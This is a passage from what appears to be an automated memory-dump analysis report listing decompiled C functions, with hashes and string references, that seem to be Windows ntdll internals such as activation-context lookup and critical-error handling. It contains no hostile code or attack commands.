                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 64262cc1f40a1cbd8baec28ec2345d59cd7ce306faa3aa70375722c42642aa98
                                                    • Instruction ID: 1acd9bbb189e3ab5ddb57da58640a1c7d25d346c589cb064da857681f04f9395
                                                    • Opcode Fuzzy Hash: 64262cc1f40a1cbd8baec28ec2345d59cd7ce306faa3aa70375722c42642aa98
                                                    • Instruction Fuzzy Hash: 253195B16083059FD711DF28C98096BBBECEF85794F01096EF5A593210E638ED04DBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
                                                    			E04B51B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                    				intOrPtr _v8;
                                                    				char _v16;
                                                    				intOrPtr* _t26;
                                                    				intOrPtr _t29;
                                                    				void* _t30;
                                                    				signed int _t31;
                                                    
                                                    				_t27 = __ecx;
                                                    				_t29 = __edx;
                                                    				_t31 = 0;
                                                    				_v8 = __edx;
                                                    				if(__edx == 0) {
                                                    					L18:
                                                    					_t30 = 0xc000000d;
                                                    					goto L12;
                                                    				} else {
                                                    					_t26 = _a4;
                                                    					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                    						goto L18;
                                                    					} else {
                                                    						E04B8BB40(__ecx,  &_v16, __ecx);
                                                    						_push(_t26);
                                                    						_push(0);
                                                    						_push(0);
                                                    						_push(_t29);
                                                    						_push( &_v16);
                                                    						_t30 = E04B8A9B0();
                                                    						if(_t30 >= 0) {
                                                    							_t19 =  *_t26;
                                                    							if( *_t26 != 0) {
                                                    								goto L7;
                                                    							} else {
                                                    								 *_a8 =  *_a8 & 0;
                                                    							}
                                                    						} else {
                                                    							if(_t30 != 0xc0000023) {
                                                    								L9:
                                                    								_push(_t26);
                                                    								_push( *_t26);
                                                    								_push(_t31);
                                                    								_push(_v8);
                                                    								_push( &_v16);
                                                    								_t30 = E04B8A9B0();
                                                    								if(_t30 < 0) {
                                                    									L12:
                                                    									if(_t31 != 0) {
                                                    										L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                    									}
                                                    								} else {
                                                    									 *_a8 = _t31;
                                                    								}
                                                    							} else {
                                                    								_t19 =  *_t26;
                                                    								if( *_t26 == 0) {
                                                    									_t31 = 0;
                                                    								} else {
                                                    									L7:
                                                    									_t31 = L04B64620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                    								}
                                                    								if(_t31 == 0) {
                                                    									_t30 = 0xc0000017;
                                                    								} else {
                                                    									goto L9;
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t30;
                                                    			}










                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: WindowsExcludedProcs
                                                    • API String ID: 0-3583428290
                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                    • Instruction ID: 0d4e81c4cd5854808c052ee5e1ba5dad5653a2c2d407d84f0e2c1b146aa88140
                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                    • Instruction Fuzzy Hash: 1C21D376A08228ABDB229A9D8840F6BB7BDEB41750F0544E6BD149F210EA35FD10D7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B6F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                    				intOrPtr _t13;
                                                    				intOrPtr _t14;
                                                    				signed int _t16;
                                                    				signed char _t17;
                                                    				intOrPtr _t19;
                                                    				intOrPtr _t21;
                                                    				intOrPtr _t23;
                                                    				intOrPtr* _t25;
                                                    
                                                    				_t25 = _a8;
                                                    				_t17 = __ecx;
                                                    				if(_t25 == 0) {
                                                    					_t19 = 0xc00000f2;
                                                    					L8:
                                                    					return _t19;
                                                    				}
                                                    				if((__ecx & 0xfffffffe) != 0) {
                                                    					_t19 = 0xc00000ef;
                                                    					goto L8;
                                                    				}
                                                    				_t19 = 0;
                                                    				 *_t25 = 0;
                                                    				_t21 = 0;
                                                    				_t23 = "Actx ";
                                                    				if(__edx != 0) {
                                                    					if(__edx == 0xfffffffc) {
                                                    						L21:
                                                    						_t21 = 0x200;
                                                    						L5:
                                                    						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                    						 *_t25 = _t13;
                                                    						L6:
                                                    						if(_t13 == 0) {
                                                    							if((_t17 & 0x00000001) != 0) {
                                                    								 *_t25 = _t23;
                                                    							}
                                                    						}
                                                    						L7:
                                                    						goto L8;
                                                    					}
                                                    					if(__edx == 0xfffffffd) {
                                                    						 *_t25 = _t23;
                                                    						_t13 = _t23;
                                                    						goto L6;
                                                    					}
                                                    					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                    					 *_t25 = _t13;
                                                    					L14:
                                                    					if(_t21 == 0) {
                                                    						goto L6;
                                                    					}
                                                    					goto L5;
                                                    				}
                                                    				_t14 = _a4;
                                                    				if(_t14 != 0) {
                                                    					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                    					if(_t16 <= 1) {
                                                    						_t21 = 0x1f8;
                                                    						_t13 = 0;
                                                    						goto L14;
                                                    					}
                                                    					if(_t16 == 2) {
                                                    						goto L21;
                                                    					}
                                                    					if(_t16 != 4) {
                                                    						_t19 = 0xc00000f0;
                                                    						goto L7;
                                                    					}
                                                    					_t13 = 0;
                                                    					goto L6;
                                                    				} else {
                                                    					_t21 = 0x1f8;
                                                    					goto L5;
                                                    				}
                                                    			}












                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Actx
                                                    • API String ID: 0-89312691
                                                    • Opcode ID: a11f84833a0aa7b3e5a2daecfe8eacc36341dc2ae81f32a2126be86e5ac52d86
                                                    • Instruction ID: 297017934d437013d149a1cb0084623f31bde2ce73adf01a5a51c9952056d323
                                                    • Opcode Fuzzy Hash: a11f84833a0aa7b3e5a2daecfe8eacc36341dc2ae81f32a2126be86e5ac52d86
                                                    • Instruction Fuzzy Hash: EA11EF353046028BEB244E1DA990736729AFB96364F2445BAE873CB391EB7CF8009780
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 71%
                                                    			E04BF8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                    				intOrPtr _t35;
                                                    				void* _t41;
                                                    
                                                    				_t40 = __esi;
                                                    				_t39 = __edi;
                                                    				_t38 = __edx;
                                                    				_t35 = __ecx;
                                                    				_t34 = __ebx;
                                                    				_push(0x74);
                                                    				_push(0x4c20d50);
                                                    				E04B9D0E8(__ebx, __edi, __esi);
                                                    				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                    				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                    				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                    					E04BD5720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                    					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                    						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                    						asm("int3");
                                                    						 *(_t41 - 4) = 0xfffffffe;
                                                    					}
                                                    				}
                                                    				 *(_t41 - 4) = 1;
                                                    				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                    				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                    				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                    				 *((intOrPtr*)(_t41 - 0x64)) = L04B9DEF0;
                                                    				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                    				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                    				_push(_t41 - 0x70);
                                                    				L04B9DEF0(1, _t38);
                                                    				 *(_t41 - 4) = 0xfffffffe;
                                                    				return E04B9D130(_t34, _t39, _t40);
                                                    			}






                                                    Strings
                                                    • Critical error detected %lx, xrefs: 04BF8E21
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Critical error detected %lx
                                                    • API String ID: 0-802127002
                                                    • Opcode ID: 12fda3569f0f490acb6d8b333a231dbd5fd24ac83ce18768e4ed51e250a3b607
                                                    • Instruction ID: cb310887da572d05aecf7dc31dd428d7c5258e09bd1514acd198a414bbe909f0
                                                    • Opcode Fuzzy Hash: 12fda3569f0f490acb6d8b333a231dbd5fd24ac83ce18768e4ed51e250a3b607
                                                    • Instruction Fuzzy Hash: 33118B75D00348EBEF24DFA98A057DCBBB4FB04314F2046AED228AB291D3302A06CF14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04BDFF60
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                    • API String ID: 0-1911121157
                                                    • Opcode ID: a2da3c05056952d9f8a95267ee45d4ae5190d262020d1ae3631d097edbf7c4c4
                                                    • Instruction ID: 3bcb19aa58d3270acab3c8b274af3bf9c5ab9b6b85da6e67544b355a7f24fe71
                                                    • Opcode Fuzzy Hash: a2da3c05056952d9f8a95267ee45d4ae5190d262020d1ae3631d097edbf7c4c4
                                                    • Instruction Fuzzy Hash: B411AD76911148EFEF26EF50C949FA8BBB2FF08709F1480D4E5096B2A1D739B940DB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 88%
                                                    			E04C15BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                    				signed int _t296;
                                                    				signed char _t298;
                                                    				signed int _t301;
                                                    				signed int _t306;
                                                    				signed int _t310;
                                                    				signed char _t311;
                                                    				intOrPtr _t312;
                                                    				signed int _t313;
                                                    				void* _t327;
                                                    				signed int _t328;
                                                    				intOrPtr _t329;
                                                    				intOrPtr _t333;
                                                    				signed char _t334;
                                                    				signed int _t336;
                                                    				void* _t339;
                                                    				signed int _t340;
                                                    				signed int _t356;
                                                    				signed int _t362;
                                                    				short _t367;
                                                    				short _t368;
                                                    				short _t373;
                                                    				signed int _t380;
                                                    				void* _t382;
                                                    				short _t385;
                                                    				signed short _t392;
                                                    				signed char _t393;
                                                    				signed int _t395;
                                                    				signed char _t397;
                                                    				signed int _t398;
                                                    				signed short _t402;
                                                    				void* _t406;
                                                    				signed int _t412;
                                                    				signed char _t414;
                                                    				signed short _t416;
                                                    				signed int _t421;
                                                    				signed char _t427;
                                                    				intOrPtr _t434;
                                                    				signed char _t435;
                                                    				signed int _t436;
                                                    				signed int _t442;
                                                    				signed int _t446;
                                                    				signed int _t447;
                                                    				signed int _t451;
                                                    				signed int _t453;
                                                    				signed int _t454;
                                                    				signed int _t455;
                                                    				intOrPtr _t456;
                                                    				intOrPtr* _t457;
                                                    				short _t458;
                                                    				signed short _t462;
                                                    				signed int _t469;
                                                    				intOrPtr* _t474;
                                                    				signed int _t475;
                                                    				signed int _t479;
                                                    				signed int _t480;
                                                    				signed int _t481;
                                                    				short _t485;
                                                    				signed int _t491;
                                                    				signed int* _t494;
                                                    				signed int _t498;
                                                    				signed int _t505;
                                                    				intOrPtr _t506;
                                                    				signed short _t508;
                                                    				signed int _t511;
                                                    				void* _t517;
                                                    				signed int _t519;
                                                    				signed int _t522;
                                                    				void* _t523;
                                                    				signed int _t524;
                                                    				void* _t528;
                                                    				signed int _t529;
                                                    
                                                    				_push(0xd4);
                                                    				_push(0x4c21178);
                                                    				E04B9D0E8(__ebx, __edi, __esi);
                                                    				_t494 = __edx;
                                                    				 *(_t528 - 0xcc) = __edx;
                                                    				_t511 = __ecx;
                                                    				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                    				 *(_t528 - 0xbc) = __ecx;
                                                    				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                    				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                    				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                    				_t427 = 0;
                                                    				 *(_t528 - 0x74) = 0;
                                                    				 *(_t528 - 0x9c) = 0;
                                                    				 *(_t528 - 0x84) = 0;
                                                    				 *(_t528 - 0xac) = 0;
                                                    				 *(_t528 - 0x88) = 0;
                                                    				 *(_t528 - 0xa8) = 0;
                                                    				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                    				if( *(_t528 + 0x1c) <= 0x80) {
                                                    					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                    					if(__eflags != 0) {
                                                    						_t421 = E04C14C56(0, __edx, __ecx, __eflags);
                                                    						__eflags = _t421;
                                                    						if(_t421 != 0) {
                                                    							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                    							E04B8D000(0x410);
                                                    							 *(_t528 - 0x18) = _t529;
                                                    							 *(_t528 - 0x9c) = _t529;
                                                    							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                    							E04C15542(_t528 - 0x9c, _t528 - 0x84);
                                                    						}
                                                    					}
                                                    					_t435 = _t427;
                                                    					 *(_t528 - 0xd0) = _t435;
                                                    					_t474 = _t511 + 0x65;
                                                    					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                    					_t511 = 0x18;
                                                    					while(1) {
                                                    						 *(_t528 - 0xa0) = _t427;
                                                    						 *(_t528 - 0xbc) = _t427;
                                                    						 *(_t528 - 0x80) = _t427;
                                                    						 *(_t528 - 0x78) = 0x50;
                                                    						 *(_t528 - 0x79) = _t427;
                                                    						 *(_t528 - 0x7a) = _t427;
                                                    						 *(_t528 - 0x8c) = _t427;
                                                    						 *(_t528 - 0x98) = _t427;
                                                    						 *(_t528 - 0x90) = _t427;
                                                    						 *(_t528 - 0xb0) = _t427;
                                                    						 *(_t528 - 0xb8) = _t427;
                                                    						_t296 = 1 << _t435;
                                                    						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                    						__eflags = _t436 & _t296;
                                                    						if((_t436 & _t296) != 0) {
                                                    							goto L92;
                                                    						}
                                                    						__eflags =  *((char*)(_t474 - 1));
                                                    						if( *((char*)(_t474 - 1)) == 0) {
                                                    							goto L92;
                                                    						}
                                                    						_t301 =  *_t474;
                                                    						__eflags = _t494[1] - _t301;
                                                    						if(_t494[1] <= _t301) {
                                                    							L10:
                                                    							__eflags =  *(_t474 - 5) & 0x00000040;
                                                    							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                    								L12:
                                                    								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                    								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                    									goto L92;
                                                    								}
                                                    								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                    								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                    								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                    									goto L92;
                                                    								}
                                                    								__eflags = _t442 -  *(_t474 - 0x11);
                                                    								if(_t442 !=  *(_t474 - 0x11)) {
                                                    									goto L92;
                                                    								}
                                                    								L15:
                                                    								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                    								 *(_t528 - 0xc0) = _t306;
                                                    								 *(_t528 - 0xa4) = _t306;
                                                    								__eflags =  *0x4c360e8;
                                                    								if( *0x4c360e8 != 0) {
                                                    									__eflags = _t306 - 0x40;
                                                    									if(_t306 < 0x40) {
                                                    										L20:
                                                    										asm("lock inc dword [eax]");
                                                    										_t310 =  *0x4c360e8; // 0x0
                                                    										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                    										__eflags = _t311 & 0x00000001;
                                                    										if((_t311 & 0x00000001) == 0) {
                                                    											 *(_t528 - 0xa0) = _t311;
                                                    											_t475 = _t427;
                                                    											 *(_t528 - 0x74) = _t427;
                                                    											__eflags = _t475;
                                                    											if(_t475 != 0) {
                                                    												L91:
                                                    												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                    												goto L92;
                                                    											}
                                                    											asm("sbb edi, edi");
                                                    											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                    											_t511 = _t498;
                                                    											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                    											__eflags =  *(_t312 - 5) & 1;
                                                    											if(( *(_t312 - 5) & 1) != 0) {
                                                    												_push(_t528 - 0x98);
                                                    												_push(0x4c);
                                                    												_push(_t528 - 0x70);
                                                    												_push(1);
                                                    												_push(0xfffffffa);
                                                    												_t412 = E04B89710();
                                                    												_t475 = _t427;
                                                    												__eflags = _t412;
                                                    												if(_t412 >= 0) {
                                                    													_t414 =  *(_t528 - 0x98) - 8;
                                                    													 *(_t528 - 0x98) = _t414;
                                                    													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                    													 *(_t528 - 0x8c) = _t416;
                                                    													 *(_t528 - 0x79) = 1;
                                                    													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                    													__eflags = _t511;
                                                    												}
                                                    											}
                                                    											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                    											__eflags = _t446 & 0x00000004;
                                                    											if((_t446 & 0x00000004) != 0) {
                                                    												__eflags =  *(_t528 - 0x9c);
                                                    												if( *(_t528 - 0x9c) != 0) {
                                                    													 *(_t528 - 0x7a) = 1;
                                                    													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                    													__eflags = _t511;
                                                    												}
                                                    											}
                                                    											_t313 = 2;
                                                    											_t447 = _t446 & _t313;
                                                    											__eflags = _t447;
                                                    											 *(_t528 - 0xd4) = _t447;
                                                    											if(_t447 != 0) {
                                                    												_t406 = 0x10;
                                                    												_t511 = _t511 + _t406;
                                                    												__eflags = _t511;
                                                    											}
                                                    											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                    											 *(_t528 - 0x88) = _t427;
                                                    											__eflags =  *(_t528 + 0x1c);
                                                    											if( *(_t528 + 0x1c) <= 0) {
                                                    												L45:
                                                    												__eflags =  *(_t528 - 0xb0);
                                                    												if( *(_t528 - 0xb0) != 0) {
                                                    													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                    													__eflags = _t511;
                                                    												}
                                                    												__eflags = _t475;
                                                    												if(_t475 != 0) {
                                                    													asm("lock dec dword [ecx+edx*8+0x4]");
                                                    													goto L100;
                                                    												} else {
                                                    													_t494[3] = _t511;
                                                    													_t451 =  *(_t528 - 0xa0);
                                                    													_t427 = E04B86DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                    													 *(_t528 - 0x88) = _t427;
                                                    													__eflags = _t427;
                                                    													if(_t427 == 0) {
                                                    														__eflags = _t511 - 0xfff8;
                                                    														if(_t511 <= 0xfff8) {
                                                    															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                    															asm("sbb ecx, ecx");
                                                    															__eflags = (_t451 & 0x000000e2) + 8;
                                                    														}
                                                    														asm("lock dec dword [eax+edx*8+0x4]");
                                                    														L100:
                                                    														goto L101;
                                                    													}
                                                    													_t453 =  *(_t528 - 0xa0);
                                                    													 *_t494 = _t453;
                                                    													_t494[1] = _t427;
                                                    													_t494[2] =  *(_t528 - 0xbc);
                                                    													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                    													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                    													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                    													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                    													asm("movsd");
                                                    													asm("movsd");
                                                    													asm("movsd");
                                                    													asm("movsd");
                                                    													asm("movsd");
                                                    													asm("movsd");
                                                    													asm("movsd");
                                                    													asm("movsd");
                                                    													__eflags =  *(_t528 + 0x14);
                                                    													if( *(_t528 + 0x14) == 0) {
                                                    														__eflags =  *[fs:0x18] + 0xf50;
                                                    													}
                                                    													asm("movsd");
                                                    													asm("movsd");
                                                    													asm("movsd");
                                                    													asm("movsd");
                                                    													__eflags =  *(_t528 + 0x18);
                                                    													if( *(_t528 + 0x18) == 0) {
                                                    														_t454 =  *(_t528 - 0x80);
                                                    														_t479 =  *(_t528 - 0x78);
                                                    														_t327 = 1;
                                                    														__eflags = 1;
                                                    													} else {
                                                    														_t146 = _t427 + 0x50; // 0x50
                                                    														_t454 = _t146;
                                                    														 *(_t528 - 0x80) = _t454;
                                                    														_t382 = 0x18;
                                                    														 *_t454 = _t382;
                                                    														 *((short*)(_t454 + 2)) = 1;
                                                    														_t385 = 0x10;
                                                    														 *((short*)(_t454 + 6)) = _t385;
                                                    														 *(_t454 + 4) = 0;
                                                    														asm("movsd");
                                                    														asm("movsd");
                                                    														asm("movsd");
                                                    														asm("movsd");
                                                    														_t327 = 1;
                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                    														_t479 = 0x68;
                                                    														 *(_t528 - 0x78) = _t479;
                                                    													}
                                                    													__eflags =  *(_t528 - 0x79) - _t327;
                                                    													if( *(_t528 - 0x79) == _t327) {
                                                    														_t524 = _t479 + _t427;
                                                    														_t508 =  *(_t528 - 0x8c);
                                                    														 *_t524 = _t508;
                                                    														_t373 = 2;
                                                    														 *((short*)(_t524 + 2)) = _t373;
                                                    														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                    														 *((short*)(_t524 + 4)) = 0;
                                                    														_t167 = _t524 + 8; // 0x8
                                                    														E04B8F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                    														_t529 = _t529 + 0xc;
                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                    														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                    														 *(_t528 - 0x78) = _t479;
                                                    														_t380 =  *(_t528 - 0x80);
                                                    														__eflags = _t380;
                                                    														if(_t380 != 0) {
                                                    															_t173 = _t380 + 4;
                                                    															 *_t173 =  *(_t380 + 4) | 1;
                                                    															__eflags =  *_t173;
                                                    														}
                                                    														_t454 = _t524;
                                                    														 *(_t528 - 0x80) = _t454;
                                                    														_t327 = 1;
                                                    														__eflags = 1;
                                                    													}
                                                    													__eflags =  *(_t528 - 0xd4);
                                                    													if( *(_t528 - 0xd4) == 0) {
                                                    														_t505 =  *(_t528 - 0x80);
                                                    													} else {
                                                    														_t505 = _t479 + _t427;
                                                    														_t523 = 0x10;
                                                    														 *_t505 = _t523;
                                                    														_t367 = 3;
                                                    														 *((short*)(_t505 + 2)) = _t367;
                                                    														_t368 = 4;
                                                    														 *((short*)(_t505 + 6)) = _t368;
                                                    														 *(_t505 + 4) = 0;
                                                    														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                    														_t327 = 1;
                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                    														_t479 = _t479 + _t523;
                                                    														 *(_t528 - 0x78) = _t479;
                                                    														__eflags = _t454;
                                                    														if(_t454 != 0) {
                                                    															_t186 = _t454 + 4;
                                                    															 *_t186 =  *(_t454 + 4) | 1;
                                                    															__eflags =  *_t186;
                                                    														}
                                                    														 *(_t528 - 0x80) = _t505;
                                                    													}
                                                    													__eflags =  *(_t528 - 0x7a) - _t327;
                                                    													if( *(_t528 - 0x7a) == _t327) {
                                                    														 *(_t528 - 0xd4) = _t479 + _t427;
                                                    														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                    														E04B8F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                    														_t529 = _t529 + 0xc;
                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                    														_t479 =  *(_t528 - 0x78) + _t522;
                                                    														 *(_t528 - 0x78) = _t479;
                                                    														__eflags = _t505;
                                                    														if(_t505 != 0) {
                                                    															_t199 = _t505 + 4;
                                                    															 *_t199 =  *(_t505 + 4) | 1;
                                                    															__eflags =  *_t199;
                                                    														}
                                                    														_t505 =  *(_t528 - 0xd4);
                                                    														 *(_t528 - 0x80) = _t505;
                                                    													}
                                                    													__eflags =  *(_t528 - 0xa8);
                                                    													if( *(_t528 - 0xa8) != 0) {
                                                    														_t356 = _t479 + _t427;
                                                    														 *(_t528 - 0xd4) = _t356;
                                                    														_t462 =  *(_t528 - 0xac);
                                                    														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                    														_t485 = 0xc;
                                                    														 *((short*)(_t356 + 2)) = _t485;
                                                    														 *(_t356 + 6) = _t462;
                                                    														 *((short*)(_t356 + 4)) = 0;
                                                    														_t211 = _t356 + 8; // 0x9
                                                    														E04B8F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                    														E04B8FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                    														_t529 = _t529 + 0x18;
                                                    														_t427 =  *(_t528 - 0x88);
                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                    														_t505 =  *(_t528 - 0xd4);
                                                    														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                    														 *(_t528 - 0x78) = _t479;
                                                    														_t362 =  *(_t528 - 0x80);
                                                    														__eflags = _t362;
                                                    														if(_t362 != 0) {
                                                    															_t222 = _t362 + 4;
                                                    															 *_t222 =  *(_t362 + 4) | 1;
                                                    															__eflags =  *_t222;
                                                    														}
                                                    													}
                                                    													__eflags =  *(_t528 - 0xb0);
                                                    													if( *(_t528 - 0xb0) != 0) {
                                                    														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                    														_t458 = 0xb;
                                                    														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                    														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                    														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                    														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                    														E04B8FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                    														_t529 = _t529 + 0xc;
                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                    														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                    														 *(_t528 - 0x78) = _t479;
                                                    														__eflags = _t505;
                                                    														if(_t505 != 0) {
                                                    															_t241 = _t505 + 4;
                                                    															 *_t241 =  *(_t505 + 4) | 1;
                                                    															__eflags =  *_t241;
                                                    														}
                                                    													}
                                                    													_t328 =  *(_t528 + 0x1c);
                                                    													__eflags = _t328;
                                                    													if(_t328 == 0) {
                                                    														L87:
                                                    														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                    														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                    														_t455 =  *(_t528 - 0xdc);
                                                    														 *(_t427 + 0x14) = _t455;
                                                    														_t480 =  *(_t528 - 0xa0);
                                                    														_t517 = 3;
                                                    														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                    														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                    															asm("rdtsc");
                                                    															 *(_t427 + 0x3c) = _t480;
                                                    														} else {
                                                    															 *(_t427 + 0x3c) = _t455;
                                                    														}
                                                    														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                    														_t456 =  *[fs:0x18];
                                                    														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
